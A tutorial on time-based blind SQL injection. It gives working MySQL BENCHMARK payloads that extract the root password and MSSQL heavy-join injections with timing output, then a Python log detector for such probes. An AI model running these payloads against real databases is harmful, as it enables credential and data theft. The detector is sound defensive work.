Time attack (MySQL)
When you can't see any kind of result, you must use a time attack.
In this example we will try to obtain the password of the root user in MySQL (if you have root
privileges on MySQL).
The BENCHMARK function is used to make a query take some seconds.
Blind Sql Injection – Regular Expressions Attack
Syntax: BENCHMARK(count, expression), which evaluates the expression that many times.
When you use it inside an IF() expression, you can build a time attack in MySQL:
SELECT 1,1 UNION SELECT
IF(SUBSTRING(Password,1,1)='a',BENCHMARK(100000,SHA1(1)),0) User,Password
FROM mysql.user WHERE User = 'root';
SELECT 1,1 UNION SELECT
IF(SUBSTRING(Password,1,1)='b',BENCHMARK(100000,SHA1(1)),0) User,Password
FROM mysql.user WHERE User = 'root';
SELECT 1,1 UNION SELECT
IF(SUBSTRING(Password,1,1)='c',BENCHMARK(100000,SHA1(1)),0) User,Password
FROM mysql.user WHERE User = 'root';
SELECT 1,1 UNION SELECT
IF(SUBSTRING(Password,1,1)='d',BENCHMARK(100000,SHA1(1)),0) User,Password
FROM mysql.user WHERE User = 'root';
And so on, until you see the BENCHMARK run (the response takes a few seconds longer). Then proceed
with the 2nd character of the password...
Time attack (MSSQL)
In this example we will try to obtain a username from the sysusers table.
A simple way to generate time delays is to take advantage of one of the biggest database
problems, the one that made performance-tuning techniques necessary in the first place: heavy
queries. All you need to generate a time delay is access to a table that has some records and a
query built to force the engine to work; in other words, a query that ignores everything the
performance best practices recommend. (This technique was devised by Chema Alonso, Microsoft
Security MVP.)
site.com/news.aspx?id=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as
sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6,
sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1
ascii(substring(name,1,1)) from sysusers)
Positive result. The condition is true, and the response is delayed by 14 seconds. We now
know that the ASCII value of the first letter of the first username in the sysusers table is lower
than 300.
site.com/news.aspx?id=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as
sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6,
sysusers AS sys7, sysusers AS sys8)>1 and 0 >(select top 1 ascii(substring(name,1,1))
from sysusers)
Negative result. One-second response. We now know that the ASCII value of the first letter of
the first username in the sysusers table is higher than 0.
And so on for all the possibilities:
[...] >1 and 300 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 14 seconds → TRUE
[...] >1 and 0 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second → FALSE
[...] >1 and 150 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 14 seconds → TRUE
[...] >1 and 75 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second → FALSE
[...] >1 and 100 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second → FALSE
[...] >1 and 110 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second → FALSE
[...] >1 and 120 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 14 seconds → TRUE
[...] >1 and 115 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second → FALSE
[...] >1 and 118 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second → FALSE
[...] >1 and 119 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second → FALSE
So the result is ASCII(119) = 'w'.
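Both oracles on this page leave a distinctive trace in the web server's access log: a series of requests from one client whose query strings carry the same SQL fragments (BENCHMARK(), ascii(substring(...)), a table joined to itself many times) and whose response times fall into two classes, around one second and around fourteen. The following is an added detection example, not code from the original post. The log lines are constructed (Apache combined style with the response time in milliseconds as the last field; 10.0.0.9 replays the MSSQL probes above with thresholds 300, 0, 150 and 75, 10.0.0.22 sends one MySQL BENCHMARK() conditional, 10.0.0.5 is ordinary traffic), and the 5-second slow threshold is an assumption to be tuned against the site's own baseline. The signature list also covers the explicit delay functions SLEEP() and WAITFOR DELAY, which the post does not use but which produce the same timing pattern.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log sample: Apache combined style with a trailing response time in ms.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2010:10:00:01 +0000] "GET /news.aspx?id=1 HTTP/1.1" 200 5120 212
10.0.0.5 - - [12/Mar/2010:10:00:09 +0000] "GET /news.aspx?id=2 HTTP/1.1" 200 4988 240
10.0.0.9 - - [12/Mar/2010:10:01:00 +0000] "GET /news.aspx?id=1%20and%20(SELECT%20count(*)%20FROM%20sysusers%20AS%20sys1,sysusers%20AS%20sys2,sysusers%20AS%20sys3,sysusers%20AS%20sys4)%3E1%20and%20300%3E(select%20top%201%20ascii(substring(name,1,1))%20from%20sysusers) HTTP/1.1" 200 5120 14021
10.0.0.9 - - [12/Mar/2010:10:01:16 +0000] "GET /news.aspx?id=1%20and%20(SELECT%20count(*)%20FROM%20sysusers%20AS%20sys1,sysusers%20AS%20sys2,sysusers%20AS%20sys3,sysusers%20AS%20sys4)%3E1%20and%200%3E(select%20top%201%20ascii(substring(name,1,1))%20from%20sysusers) HTTP/1.1" 200 5120 1003
10.0.0.9 - - [12/Mar/2010:10:01:18 +0000] "GET /news.aspx?id=1%20and%20(SELECT%20count(*)%20FROM%20sysusers%20AS%20sys1,sysusers%20AS%20sys2,sysusers%20AS%20sys3,sysusers%20AS%20sys4)%3E1%20and%20150%3E(select%20top%201%20ascii(substring(name,1,1))%20from%20sysusers) HTTP/1.1" 200 5120 14100
10.0.0.9 - - [12/Mar/2010:10:01:33 +0000] "GET /news.aspx?id=1%20and%20(SELECT%20count(*)%20FROM%20sysusers%20AS%20sys1,sysusers%20AS%20sys2,sysusers%20AS%20sys3,sysusers%20AS%20sys4)%3E1%20and%2075%3E(select%20top%201%20ascii(substring(name,1,1))%20from%20sysusers) HTTP/1.1" 200 5120 998
10.0.0.22 - - [12/Mar/2010:10:02:00 +0000] "GET /item.php?id=1%20AND%20IF(SUBSTRING(Password,1,1)='a',BENCHMARK(100000,SHA1(1)),0) HTTP/1.1" 200 3100 6500
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) (?P<ms>\d+)$'
)

# Signatures of the time oracles the post describes, matched against the decoded query string.
INDICATORS = {
    "benchmark_call": re.compile(r"\bbenchmark\s*\(", re.I),                    # MySQL CPU burn
    "explicit_delay": re.compile(r"\bsleep\s*\(|\bwaitfor\s+delay\b", re.I),    # MySQL SLEEP / MSSQL WAITFOR
    "char_oracle": re.compile(r"\bascii\s*\(\s*substring\s*\(|\bsubstring\s*\(\s*password", re.I),
}
HEAVY_JOIN_RE = re.compile(r"\bsysusers\b", re.I)  # the post's delay: one table joined to itself repeatedly
SLOW_MS = 5000  # assumed threshold for a "delayed" response; tune to the site's baseline


def parse_line(line):
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ms"] = int(rec["ms"])
    rec["query"] = unquote_plus(rec["url"].partition("?")[2])
    return rec


def indicators_for(query):
    hits = [name for name, rx in INDICATORS.items() if rx.search(query)]
    if len(HEAVY_JOIN_RE.findall(query)) >= 3:
        hits.append("heavy_self_join")
    return hits


def analyze(log_text):
    """Per client: count requests carrying oracle signatures and split their response times
    into fast and slow. A working oracle produces exactly that two-class timing pattern."""
    per_client = defaultdict(lambda: {"flagged": 0, "slow": 0, "fast": 0, "indicators": set()})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = indicators_for(rec["query"])
        if not hits:
            continue
        s = per_client[rec["ip"]]
        s["flagged"] += 1
        s["indicators"].update(hits)
        s["slow" if rec["ms"] >= SLOW_MS else "fast"] += 1
    for s in per_client.values():
        s["time_oracle"] = s["flagged"] >= 2 and s["slow"] > 0 and s["fast"] > 0
    return dict(per_client)


if __name__ == "__main__":
    for ip, summary in analyze(SAMPLE_LOG).items():
        print(ip, summary)
```

The signature match alone is enough to raise an alert; the fast/slow split is what separates a scanner that merely sent a payload from an oracle that is actually answering, because only the latter yields both timing classes from the same client. The benign client never appears in the output, and the single BENCHMARK() request is flagged but not yet confirmed as an oracle.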